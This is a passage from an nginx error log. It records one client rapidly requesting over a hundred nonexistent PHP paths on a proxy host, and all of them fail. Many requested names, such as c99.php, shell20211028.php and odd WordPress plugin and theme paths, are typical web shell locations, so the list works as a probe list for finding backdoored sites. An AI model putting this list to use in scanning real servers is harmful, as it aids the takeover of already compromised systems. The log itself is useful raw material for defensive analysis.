*1954 open() "/var/www/html/ava.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ava.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:09 [error] 210#210: *1954 open() "/var/www/html/nks.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /nks.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:09 [error] 210#210: *1954 open() "/var/www/html/wp-content/languages/index.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/languages/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:10 [error] 210#210: *1954 open() "/var/www/html/wp-content/uploads/index.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/uploads/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:10 [error] 210#210: *1954 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:10 [error] 210#210: *1954 open() "/var/www/html/.well-known/content.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /.well-known/content.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:10 [error] 210#210: *1954 open() "/var/www/html/sxo.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /sxo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:11 [error] 210#210: *1954 open() "/var/www/html/wp-content/themes/hideo/network.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/hideo/network.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:11 [error] 210#210: *1954 open() "/var/www/html/cache/wp-post-data.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /cache/wp-post-data.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:11 [error] 210#210: *1954 open() "/var/www/html/uploads/Casper.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /uploads/Casper.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:11 [error] 210#210: *1954 open() "/var/www/html/new.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /new.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:12 [error] 210#210: *1954 open() "/var/www/html/wp-admin/images/commentv.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/commentv.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:12 [error] 210#210: *1954 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:12 [error] 210#210: *1954 open() "/var/www/html/dom.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /dom.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:12 [error] 210#210: *1954 open() "/var/www/html/ooj.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ooj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:13 [error] 210#210: *1954 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:13 [error] 210#210: *1954 open() "/var/www/html/BGA.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /BGA.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:13 [error] 210#210: *1954 open() "/var/www/html/sad/about.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //sad/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:13 [error] 210#210: *1954 open() "/var/www/html/nas.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /nas.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:14 [error] 210#210: *1954 open() "/var/www/html/loi.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /loi.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:14 [error] 210#210: *1954 open() "/var/www/html/lov.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /lov.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:14 [error] 210#210: *1954 open() "/var/www/html/avaa.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /avaa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:15 [error] 210#210: *1954 open() "/var/www/html/nwwha.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /nwwha.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:15 [error] 210#210: *1954 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:15 [error] 210#210: *1954 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:15 [error] 210#210: *1954 open() "/var/www/html/wp-includes/IXR/moon.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/IXR/moon.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:16 [error] 210#210: *1954 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //shell20211028.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:16 [error] 210#210: *1954 open() "/var/www/html/skin/install/default/security.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //skin/install/default/security.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:16 [error] 210#210: *1954 open() "/var/www/html/~norapump/hah.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /~norapump/hah.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:16 [error] 210#210: *1954 open() "/var/www/html/wp-admin/class-db.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/class-db.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:17 [error] 210#210: *1954 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:17 [error] 210#210: *1954 open() "/var/www/html/gib.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /gib.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:17 [error] 210#210: *1954 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:17 [error] 210#210: *1954 open() "/var/www/html/wp-content/plugins/achdxhv/languages/admin.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:18 [error] 210#210: *1954 open() "/var/www/html/hzz.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /hzz.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:18 [error] 210#210: *1954 open() "/var/www/html/rezor.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /rezor.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:18 [error] 210#210: *1954 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:18 [error] 210#210: *1954 open() "/var/www/html/oivcl.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /oivcl.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:19 [error] 210#210: *1954 open() "/var/www/html/wp-admin/install.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/install.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:19 [error] 210#210: *1954 open() "/var/www/html/db.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /db.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:19 [error] 210#210: *1954 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //autoload_classmap.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:19 [error] 210#210: *1954 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:20 [error] 210#210: *1954 open() "/var/www/html/images/c99.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /images/c99.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:20 [error] 210#210: *1954 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:20 [error] 210#210: *1954 open() "/var/www/html/ps.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ps.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:20 [error] 210#210: *1954 open() "/var/www/html/wp-content/about.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:21 [error] 210#210: *1954 open() "/var/www/html/output.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /output.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:21 [error] 210#210: *1954 open() "/var/www/html/wp-xml.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-xml.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:21 [error] 210#210: *1954 open() "/var/www/html/13.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /13.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:21 [error] 210#210: *1954 open() "/var/www/html/wp-2019.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-2019.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:22 [error] 210#210: *1954 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:22 [error] 210#210: *1954 "/var/www/html/.trash7309/fafa/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/fafa/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:22 [error] 210#210: *1954 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:22 [error] 210#210: *1954 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //lufix.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:23 [error] 210#210: *1954 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //elp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:23 [error] 210#210: *1954 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:23 [error] 210#210: *1954 open() "/var/www/html/dr.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /dr.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:24 [error] 210#210: *1954 "/var/www/html/wp-includes/blocks/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:24 [error] 210#210: *1954 open() "/var/www/html/wtu.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wtu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:24 [error] 210#210: *1954 open() "/var/www/html/blog/byp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /blog/byp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:24 [error] 210#210: *1954 open() "/var/www/html/led.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /led.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:25 [error] 210#210: *1954 open() "/var/www/html/bhfnd.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /bhfnd.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:25 [error] 210#210: *1954 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:25 [error] 210#210: *1954 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /readme.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:25 [error] 210#210: *1954 open() "/var/www/html/aku.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /aku.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:26 [error] 210#210: *1954 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:26 [error] 210#210: *1954 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:26 [error] 210#210: *1954 open() "/var/www/html/fox.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /fox.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:26 [error] 210#210: *1954 open() "/var/www/html/7f8c8.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /7f8c8.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:27 [error] 210#210: *1954 open() "/var/www/html/poj.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /poj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:27 [error] 210#210: *1954 open() "/var/www/html/zze.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /zze.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:27 [error] 210#210: *1954 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:28 [error] 210#210: *1954 open() "/var/www/html/weozh.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /weozh.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:28 [error] 210#210: *1954 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:28 [error] 210#210: *1954 open() "/var/www/html/zznmg.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /zznmg.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:28 [error] 210#210: *1954 open() "/var/www/html/help/crnpwfiu.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /help/crnpwfiu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:29 [error] 210#210: *1954 open() "/var/www/html/eru.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /eru.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:29 [error] 210#210: *1954 open() "/var/www/html/index/zwso.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /index/zwso.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:29 [error] 210#210: *1954 open() "/var/www/html/images/2008.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /images/2008.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:29 [error] 210#210: *1954 open() "/var/www/html/.cache/x.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //.cache/x.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:30 [error] 210#210: *1954 open() "/var/www/html/pow.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /pow.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:30 [error] 210#210: *1954 open() "/var/www/html/dop.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /dop.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:30 [error] 210#210: *1954 "/var/www/html/wp-content/plugins/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:30 [error] 210#210: *1954 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:31 [error] 210#210: *1954 open() "/var/www/html/MTOS/byp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /MTOS/byp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:31 [error] 210#210: *1954 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/assets/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:31 [error] 210#210: *1954 open() "/var/www/html/wp-includes/customize/index.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/customize/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:31 [error] 210#210: *1954 open() "/var/www/html/pkmoj.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /pkmoj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:32 [error] 210#210: *1954 open() "/var/www/html/uploads/upload2.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /uploads/upload2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:32 [error] 210#210: *1954 open() "/var/www/html/hehehehe.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /hehehehe.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:32 [error] 210#210: *1954 open() "/var/www/html/fss.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /fss.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:32 [error] 210#210: *1954 open() "/var/www/html/wwr.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wwr.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:33 [error] 210#210: *1954 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:33 [error] 210#210: *1954 open() "/var/www/html/wp-content/kj.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-content/kj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:33 [error] 210#210: *1954 open() "/var/www/html/update/wpupex.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /update/wpupex.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:33 [error] 210#210: *1954 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //install.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:34 [error] 210#210: *1954 open() "/var/www/html/kopyw.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /kopyw.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:34 [error] 210#210: *1954 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:34 [error] 210#210: *1954 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:35 [error] 210#210: *1954 open() "/var/www/html/shop.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /shop.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:35 [error] 210#210: *1954 open() "/var/www/html/lla.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /lla.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:35 [error] 210#210: *1954 open() "/var/www/html/nok.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /nok.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:35 [error] 210#210: *1954 open() "/var/www/html/wp-content/uploads/2024/dodo.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-content/uploads/2024/dodo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:36 [error] 210#210: *1954 open() "/var/www/html/ker.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ker.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:36 [error] 210#210: *1954 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:36 [error] 210#210: *1954 open() "/var/www/html/wp-includes/images/403.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/403.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:36 [error] 210#210: *1954 open() "/var/www/html/~elliotimformatiq/sxp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /~elliotimformatiq/sxp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:37 [error] 210#210: *1954 open() "/var/www/html/qfvqu.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /qfvqu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:37 [error] 210#210: *1954 open() "/var/www/html/crt.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /crt.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:37 [error] 210#210: *1954 open() "/var/www/html/2eaa2.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /2eaa2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:37 [error] 210#210: *1954 "/var/www/html/wp-includes/css/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/css/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:38 [error] 210#210: *1954 open() "/var/www/html/has.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /has.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:38 [error] 210#210: *1954 open() "/var/www/html/nka.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /nka.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:38 [error] 210#210: *1954 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:38 [error] 210#210: *1954 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:39 [error] 210#210: *1954 open() "/var/www/html/wp-includes/Text/wp-login.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/Text/wp-login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:39 [error] 210#210: *1954 open() "/var/www/html/cgi-bin/wp-login.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/wp-login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:39 [error] 210#210: *1954 open() "/var/www/html/jvcpa.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET 